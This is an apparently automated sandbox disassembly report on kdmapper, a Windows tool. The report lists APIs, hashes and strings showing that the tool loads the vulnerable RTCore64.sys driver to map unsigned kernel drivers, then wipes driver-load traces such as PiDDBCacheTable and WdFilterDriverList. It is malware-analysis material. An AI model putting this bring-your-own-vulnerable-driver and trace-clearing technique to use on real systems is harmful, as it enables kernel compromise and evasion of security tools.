systemroot, xrefs: 00007FF7738E4639
[-] win32k.sys not found, xrefs: 00007FF7738E4CF8
[-] Failed to get temp path, xrefs: 00007FF7738E43A0
[-] Failed to Load PDB, xrefs: 00007FF7738E4790
win32k.sys, xrefs: 00007FF7738E4C94
user32.dll, xrefs: 00007FF7738E461F
[-] Failed to ClearKernelHashBucketList, xrefs: 00007FF7738E4E0D
[-] Can't find TEMP folder, xrefs: 00007FF7738E4A3E

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: V01@$D@std@@@std@@U?$char_traits@_invalid_parameter_noinfo_noreturn$??6?$basic_ostream@V01@@$Virtual$?setstate@?$basic_ios@CloseFreeHandleInformationLibraryLoadQuerySystem_wremovememmoverand$??7ios_base@std@@?write@?$basic_ostream@AllocCleanupControlCreateCurrentDeviceFileFromModule64NameThreadUnloadV12@_dupenv_s_time64freememsetsrand
String ID: 0$NtUserSetGestureConfig$[!] Failed to ClearMmUnloadedDrivers$[!] Failed to ClearWdFilterDriverList$[-] Can't find TEMP folder$[-] Failed to ClearKernelHashBucketList$[-] Failed to ClearPiDDBCacheTable$[-] Failed to Load PDB$[-] Failed to Load Symbol of NtUserSetGestureConfig$[-] Failed to create vulnerable driver file$[-] Failed to get ntoskrnl.exe$[-] Failed to get temp path$[-] Failed to load driver rtcore64.sys$[-] Failed to register and start service for the vulnerable driver$[-] NtUserSetGestureConfig not found$[-] win32k.sys not found$[<] Loading vulnerable driver, Name: $\System32\win32k.sys$\\.\RTCore64$gfff$https://msdl.microsoft.com/download/symbols$ntoskrnl.exe$systemroot$user32.dll$win32k.sys$win32u.dll$xxx
API String ID: 4261666574-1894779687
Opcode ID: ca6c965419c697828ed41572e57baeb57fc7272cee40bc2890196779c665f0ad
Instruction ID: 3b58e9c53199dc5aaacbff21408e2b17cca257f27fe9620bad41c8aa17bf58a3
Opcode Fuzzy Hash: ca6c965419c697828ed41572e57baeb57fc7272cee40bc2890196779c665f0ad
Instruction Fuzzy Hash: 5352A263E38A9385EA80EB24E8402BDE361FB95798F805331D95D27695DF7EE194C330

Function 00007FF7738F1630 Relevance: 84.7, APIs: 28, Strings: 20, Instructions: 749COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7738F1673
_wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F16CB
_wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F170B
_wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F179B
_wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F17DB
_wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F184B
_wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F188B
_wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F190B
_wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F194B
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7738F19A4
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7738F19CC
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7738F19F3
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7738F1A1B

Part of subcall function 00007FF7738F1390: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F1406
Part of subcall function 00007FF7738F1390: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F143D

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7738F1A42
memcmp.VCRUNTIME140(?), ref: 00007FF7738F1C18
__std_fs_code_page.MSVCPRT ref: 00007FF7738F1BCC

Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA43A
Part of subcall function 00007FF7738EA3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA45A
Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA46A
Part of subcall function 00007FF7738EA3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA54D
Part of subcall function 00007FF7738EA3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA554
Part of subcall function 00007FF7738EA3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA561

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7738F1D58
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738F1D7B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF7738F1DB3
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF7738F1DBA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF7738F1DC1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF7738F1F17
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7738F1F7A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7738F20A0

Part of subcall function 00007FF7738EA3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA4B7

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7738F2168
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7738F2190
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F21C4
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F220B

Part of subcall function 00007FF7738F4108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7738ECF43,?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738F4122

Part of subcall function 00007FF7738F3080: memset.VCRUNTIME140 ref: 00007FF7738F30C1
Part of subcall function 00007FF7738F3080: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738F30E0
Part of subcall function 00007FF7738F3080: ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7738F30FF
Part of subcall function 00007FF7738F3080: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738F3133
Part of subcall function 00007FF7738F3080: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738F3152
Part of subcall function 00007FF7738F3080: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738F319B
Part of subcall function 00007FF7738F3080: ??7ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738F31D4

Strings

[+] Usage: kdmapper.exe [--free][--mdl][--PassAllocationPtr] driver, xrefs: 00007FF7738F1D5E
[+] Clean Valnerable Driver enabled, xrefs: 00007FF7738F1A25
[+] Allocate Independent Pages mode enabled, xrefs: 00007FF7738F19D6
[!] Incorrect Usage!, xrefs: 00007FF7738F1D3B
mdl, xrefs: 00007FF7738F1742, 00007FF7738F1B37
free, xrefs: 00007FF7738F16C4, 00007FF7738F1704
[-] File , xrefs: 00007FF7738F1F34
clean, xrefs: 00007FF7738F1904, 00007FF7738F1944
indPages, xrefs: 00007FF7738F1794, 00007FF7738F17D4
doesn't exist, xrefs: 00007FF7738F1F61
[+] Pass Allocation Ptr as first param enabled, xrefs: 00007FF7738F19FE
[+] Mdl memory usage enabled, xrefs: 00007FF7738F19AF
[+] Free pool memory after usage enabled, xrefs: 00007FF7738F1987
[-] Failed to read image to memory, xrefs: 00007FF7738F1FEF
.sys, xrefs: 00007FF7738F1C11
[+] success, xrefs: 00007FF7738F2173
[-] Too many allocation modes, xrefs: 00007FF7738F2010
[-] Failed to map , xrefs: 00007FF7738F2069
PassAllocationPtr, xrefs: 00007FF7738F1844, 00007FF7738F1884
[-] Warning failed to fully unload vulnerable driver , xrefs: 00007FF7738F214B

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: V01@$U?$char_traits@$D@std@@@std@@$??6?$basic_ostream@V01@@$_wcsicmp$_invalid_parameter_noinfo_noreturn$U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?setstate@?$basic_ios@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@??7ios_base@std@@?flush@?$basic_ostream@_?sputc@?$basic_streambuf@_?uncaught_exception@std@@D@std@@@1@_ExceptionFilterInit@?$basic_streambuf@Osfx@?$basic_ostream@_UnhandledV12@V?$basic_streambuf@__std_fs_code_pagemallocmemcmpmemset
String ID: [!] Incorrect Usage!$ doesn't exist$.sys$PassAllocationPtr$[+] Allocate Independent Pages mode enabled$[+] Clean Valnerable Driver enabled$[+] Free pool memory after usage enabled$[+] Mdl memory usage enabled$[+] Pass Allocation Ptr as first param enabled$[+] Usage: kdmapper.exe [--free][--mdl][--PassAllocationPtr] driver$[+] success$[-] Failed to map $[-] Failed to read image to memory$[-] File $[-] Too many allocation modes$[-] Warning failed to fully unload vulnerable driver $clean$free$indPages$mdl
API String ID: 3202131322-1332891958
Opcode ID: 57115e94d897f045736351ab5dfeee10681e615e4ee8e5fd71a3cef0e523c836
Instruction ID: 677ada9eb5ad60f2a7e5eebe469812377ebdd1c1cec8fbbb34665fa65a8983ce
Opcode Fuzzy Hash: 57115e94d897f045736351ab5dfeee10681e615e4ee8e5fd71a3cef0e523c836
Instruction Fuzzy Hash: 13728263E3864381EB90AB25D8402B8E361EF65BA4FC04731D96D676D4DF7EE4A48330

Function 00007FF7738E3CE0 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 122
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7738E3CE0: memset.VCRUNTIME140 ref: 00007FF7738E1F62
Part of subcall function 00007FF7738E3CE0: GetModuleFileNameA.KERNEL32 ref: 00007FF7738E1F76
Part of subcall function 00007FF7738E3CE0: PathRemoveFileSpecA.SHLWAPI ref: 00007FF7738E1F83
Part of subcall function 00007FF7738E3CE0: memmove.VCRUNTIME140 ref: 00007FF7738E205D
Part of subcall function 00007FF7738E3CE0: CreateDirectoryA.KERNEL32 ref: 00007FF7738E2087
Part of subcall function 00007FF7738E3CE0: GetLastError.KERNEL32 ref: 00007FF7738E2095

GetFileAttributesExA.KERNEL32 ref: 00007FF7738E3D7A
CreateFileA.KERNEL32 ref: 00007FF7738E3DC4
GetCurrentProcessId.KERNEL32 ref: 00007FF7738E3DD3
OpenProcess.KERNEL32 ref: 00007FF7738E3DE3
SymInitialize.DBGHELP ref: 00007FF7738E3E0B
CloseHandle.KERNEL32 ref: 00007FF7738E3E18
CloseHandle.KERNEL32 ref: 00007FF7738E3E21
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E3E88
SymSetOptions.DBGHELP ref: 00007FF7738E3E94
SymLoadModuleEx.DBGHELP ref: 00007FF7738E3ECD
SymCleanup.DBGHELP ref: 00007FF7738E3EDB

Strings

<, xrefs: 00007FF7738E2AF2
RSDS, xrefs: 00007FF7738E2DB4
%02x, xrefs: 00007FF7738E233D
symbols\, xrefs: 00007FF7738E2013
.pdb, xrefs: 00007FF7738E2486
d, xrefs: 00007FF7738E303E

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: File$CloseCreateHandleModuleProcess$AttributesCleanupCurrentDirectoryErrorInitializeLastLoadNameOpenOptionsPathRemoveSpec_invalid_parameter_noinfo_noreturnmemmovememset
String ID: %02x$.pdb$<$RSDS$d$symbols\
API String ID: 3470403176-2640848996
Opcode ID: 19db020fe7763a6a3d0e2d82ee103968594db8465301a545da02ff4b96a429cc
Instruction ID: 755326c934ad90a9c6ea97edb301d254521ca56d9ce901c88a70186a8f705807
Opcode Fuzzy Hash: 19db020fe7763a6a3d0e2d82ee103968594db8465301a545da02ff4b96a429cc
Instruction Fuzzy Hash: C351A87366CB8282EBA0DB11F41436AF7A0FB98790F804235D69D63A94DF7ED494C720

Function 00007FF7738F14C0 Relevance: 9.0, APIs: 6, Instructions: 50
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF7738F14E6
CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7738F14F3
memset.VCRUNTIME140 ref: 00007FF7738F1514
Process32FirstW.KERNEL32 ref: 00007FF7738F1529
Process32NextW.KERNEL32 ref: 00007FF7738F1541
CloseHandle.KERNEL32 ref: 00007FF7738F155A

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32memset
String ID:
API String ID: 2672634495-0
Opcode ID: 02cd4b5768b70284ca7aaefdfa948c9715f4c916770f4bda0e9fa637a8fe1042
Instruction ID: b7906496feca6a6adb8bed556e666472aa585adca3a6a760724df32b49a38eed
Opcode Fuzzy Hash: 02cd4b5768b70284ca7aaefdfa948c9715f4c916770f4bda0e9fa637a8fe1042
Instruction Fuzzy Hash: 8A114222638A4282EA90EB25E444569E360FB98BA0F944335E96E637D4DF3DD415C720

Function 00007FF7738E1330 Relevance: 5.5, APIs: 4, Instructions: 505
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7738E13AF
memmove.VCRUNTIME140 ref: 00007FF7738E13D6
memset.VCRUNTIME140 ref: 00007FF7738E13FA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7738E19C3

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: freemallocmemmovememset
String ID:
API String ID: 1050734653-0
Opcode ID: b571248dc4445a9d52385899018f1781bfa6bd60c9789f80331ab341d92d0fa1
Instruction ID: 7a7db40049bd34fe92e3f56a556679a2ce67030ed07fc19f6e7ba7273636bfa2
Opcode Fuzzy Hash: b571248dc4445a9d52385899018f1781bfa6bd60c9789f80331ab341d92d0fa1
Instruction Fuzzy Hash: EF122DA3A2C1E04AD7BD972D54B463D7FE0E385345B48526EDB9793682D93CC224DB30

Function 00007FF7738EA3C0 Relevance: 13.6, APIs: 9, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA43A
?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA45A
?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA46A
?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA4B7
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF7738EA4E1
?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA506
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA54D
?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA554
?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA561

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_D@std@@@std@@U?$char_traits@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
String ID:
API String ID: 1082002092-0
Opcode ID: ef2d79dececa04f2a13e11419a62dfe81de786ebe0591a841e3a6f70c526b580
Instruction ID: 215dff7e3061af52057168afc31480b3af2956bd337b76088739ca4e38eea83f
Opcode Fuzzy Hash: ef2d79dececa04f2a13e11419a62dfe81de786ebe0591a841e3a6f70c526b580
Instruction Fuzzy Hash: 6551A433668A8181EBA09F19E484238E7A0FF94F95F95C631CE5E577A0CF3ED5528320

Function 00007FF7738F1590 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetShellWindow.USER32 ref: 00007FF7738F15AB
GetWindowThreadProcessId.USER32 ref: 00007FF7738F15B9

Part of subcall function 00007FF7738F14C0: GetCurrentProcessId.KERNEL32 ref: 00007FF7738F14E6
Part of subcall function 00007FF7738F14C0: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7738F14F3
Part of subcall function 00007FF7738F14C0: memset.VCRUNTIME140 ref: 00007FF7738F1514
Part of subcall function 00007FF7738F14C0: Process32FirstW.KERNEL32 ref: 00007FF7738F1529
Part of subcall function 00007FF7738F14C0: Process32NextW.KERNEL32 ref: 00007FF7738F1541
Part of subcall function 00007FF7738F14C0: CloseHandle.KERNEL32 ref: 00007FF7738F155A

Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA43A
Part of subcall function 00007FF7738EA3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA45A
Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA46A
Part of subcall function 00007FF7738EA3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA54D
Part of subcall function 00007FF7738EA3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA554
Part of subcall function 00007FF7738EA3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA561

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738F15E7

Part of subcall function 00007FF7738EA3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA4B7

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738F160A
?get@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F1617

Strings

[+] Press enter to close, xrefs: 00007FF7738F15F4
[+] Pausing to allow for debugging, xrefs: 00007FF7738F15D1

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@V01@$U?$char_traits@_W@std@@@std@@$??6?$basic_ostream@?good@ios_base@std@@ProcessProcess32V01@@Window$?flush@?$basic_ostream@_?get@?$basic_istream@?setstate@?$basic_ios@?sputc@?$basic_streambuf@_?uncaught_exception@std@@CloseCreateCurrentFirstHandleNextOsfx@?$basic_ostream@_ShellSnapshotThreadToolhelp32V12@memset
String ID: [+] Pausing to allow for debugging$[+] Press enter to close
API String ID: 3552510059-3552938800
Opcode ID: db1304cfada4e5d369478eac87371c6066fc7352a77a55c4ea3d84e5fcdb4119
Instruction ID: 0c7bf9408b89d08cab27147c2ecbed4620ae5965b49692a83168fcfebb25d77d
Opcode Fuzzy Hash: db1304cfada4e5d369478eac87371c6066fc7352a77a55c4ea3d84e5fcdb4119
Instruction Fuzzy Hash: CA01ED66E38A0381EA90BB11E855079E370BFA4B84FC01231D84D67265DF3EE225C730

Function 00007FF7738F4738 Relevance: 12.1, APIs: 8, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF7738F4761
__scrt_release_startup_lock.LIBCMT ref: 00007FF7738F47CF
_register_thread_local_exe_atexit_callback.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F481D
_get_initial_wide_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F4822
__p___wargv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F482A
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F4832
_cexit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F4854
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F48AE

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: __p___argc__p___wargv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_wide_environment_register_thread_local_exe_atexit_callback
String ID:
API String ID: 1876865454-0
Opcode ID: 81a9dc358cc5445206e6b3113a70518158365fa1dd99ecfb0ae8e3a6ee9012e8
Instruction ID: 75f633584ad588cb7c5f3b31e355ad83d116424f58029442c5ed171e71379370
Opcode Fuzzy Hash: 81a9dc358cc5445206e6b3113a70518158365fa1dd99ecfb0ae8e3a6ee9012e8
Instruction Fuzzy Hash: 83316E23A3C16342FA90BB649411BB9D290AF65784FCC4136E60D672E3DE3FE4648230

Function 00007FF7738EA170 Relevance: 9.1, APIs: 6, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF7738EA1AA
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738EA1C7
_get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7738EA1F0
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7738EA23B

Part of subcall function 00007FF7738EC7A0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC7CD
Part of subcall function 00007FF7738EC7A0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC7E7
Part of subcall function 00007FF7738EC7A0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC819
Part of subcall function 00007FF7738EC7A0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC844
Part of subcall function 00007FF7738EC7A0: std::_Facet_Register.LIBCPMT ref: 00007FF7738EC85D
Part of subcall function 00007FF7738EC7A0: ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC87C

